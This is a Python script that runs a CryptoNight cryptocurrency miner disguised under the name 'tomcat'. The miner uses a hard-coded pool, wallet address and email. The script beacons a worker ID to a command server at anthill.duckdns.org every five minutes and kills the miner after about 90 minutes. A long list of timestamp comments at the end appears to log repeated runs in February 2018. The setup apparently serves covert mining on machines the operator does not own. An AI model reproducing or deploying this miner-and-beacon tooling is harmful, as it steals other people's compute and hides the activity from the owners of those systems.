import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:06.164504
#2018-02-17 17:22:04.109538
#2018-02-17 19:11:05.102024
#2018-02-17 20:59:01.429436
#2018-02-17 22:45:09.271869
#2018-02-18 00:29:07.948091
#2018-02-18 02:20:07.166974
#2018-02-18 04:08:01.422700
#2018-02-18 05:59:01.413182
#2018-02-18 07:49:04.506345
#2018-02-18 09:37:03.581186
#2018-02-18 11:22:07.438093
#2018-02-18 13:08:01.896504
#2018-02-18 14:55:04.026524
#2018-02-18 16:42:01.544361
#2018-02-18 18:31:01.876194
#2018-02-18 20:19:03.234969
#2018-02-18 22:04:02.072949
#2018-02-18 23:52:07.189918
#2018-02-19 01:39:05.045119
#2018-02-19 03:27:08.369626
#2018-02-19 05:12:06.322550
#2018-02-19 06:57:05.057538
#2018-02-19 08:47:05.433781
#2018-02-19 10:36:07.569039
#2018-02-19 12:25:04.116580
#2018-02-19 14:11:09.185648
#2018-02-19 16:02:05.148741
#2018-02-19 17:49:09.852765
#2018-02-19 19:36:02.112298
#2018-02-19 21:24:01.660012
#2018-02-19 23:09:06.315401
#2018-02-20 00:53:04.172809
#2018-02-20 02:41:07.482739
#2018-02-20 04:30:05.753209
#2018-02-20 06:14:06.075689
#2018-02-20 07:59:04.006034
#2018-02-20 09:44:07.350904
#2018-02-20 11:28:01.659884
#2018-02-20 13:14:05.034110
#2018-02-20 14:58:07.793920
#2018-02-20 16:43:08.851593
#2018-02-20 18:29:08.468831
#2018-02-20 20:21:06.741979
#2018-02-20 22:06:07.346049
#2018-02-20 23:48:07.771324
#2018-02-21 01:35:04.425788
#2018-02-21 03:22:04.703584
#2018-02-21 05:10:07.471936
#2018-02-21 06:57:05.239864
#2018-02-21 08:43:05.882660
#2018-02-21 10:28:01.610964
#2018-02-21 12:17:09.963559
#2018-02-21 14:04:07.566748
#2018-02-21 15:48:08.583504
#2018-02-21 17:42:01.343608
#2018-02-21 19:27:07.148665
#2018-02-21 21:15:08.078887
#2018-02-21 23:03:05.031167
#2018-02-22 00:51:04.706079
#2018-02-22 02:40:07.763751
#2018-02-22 04:28:01.518924
#2018-02-22 06:13:05.072598
#2018-02-22 07:57:07.092444
#2018-02-22 09:47:07.511826
#2018-02-22 11:32:01.776455
#2018-02-22 13:18:09.130231
#2018-02-22 15:07:04.798352
#2018-02-22 16:52:06.302962
#2018-02-22 18:40:10.630810
#2018-02-22 20:31:01.605243
#2018-02-22 22:16:07.162684
#2018-02-23 00:02:01.779675
#2018-02-23 01:49:06.788725
#2018-02-23 03:41:07.580472
#2018-02-23 05:27:06.299631
#2018-02-23 07:14:06.202411
#2018-02-23 09:20:08.508820
#2018-02-23 11:26:08.271842
#2018-02-23 13:17:01.380723
#2018-02-23 15:04:01.281254
#2018-02-23 16:52:06.048265
#2018-02-23 18:41:07.555171
#2018-02-23 20:27:01.776109
#2018-02-23 22:15:03.747710
#2018-02-24 00:02:07.567775
#2018-02-24 01:51:01.796881
#2018-02-24 03:39:03.611342
#2018-02-24 05:23:03.275503
#2018-02-24 07:11:05.710497
#2018-02-24 09:01:05.497713
#2018-02-24 11:01:05.301975
#2018-02-24 12:49:06.050024
#2018-02-24 14:38:06.601451
#2018-02-24 16:27:03.724305
#2018-02-24 18:18:06.497099
#2018-02-24 20:04:06.861137
#2018-02-24 21:46:01.311489
#2018-02-25 01:55:05.683362
#2018-02-25 05:44:05.249220
#2018-02-25 11:36:08.859771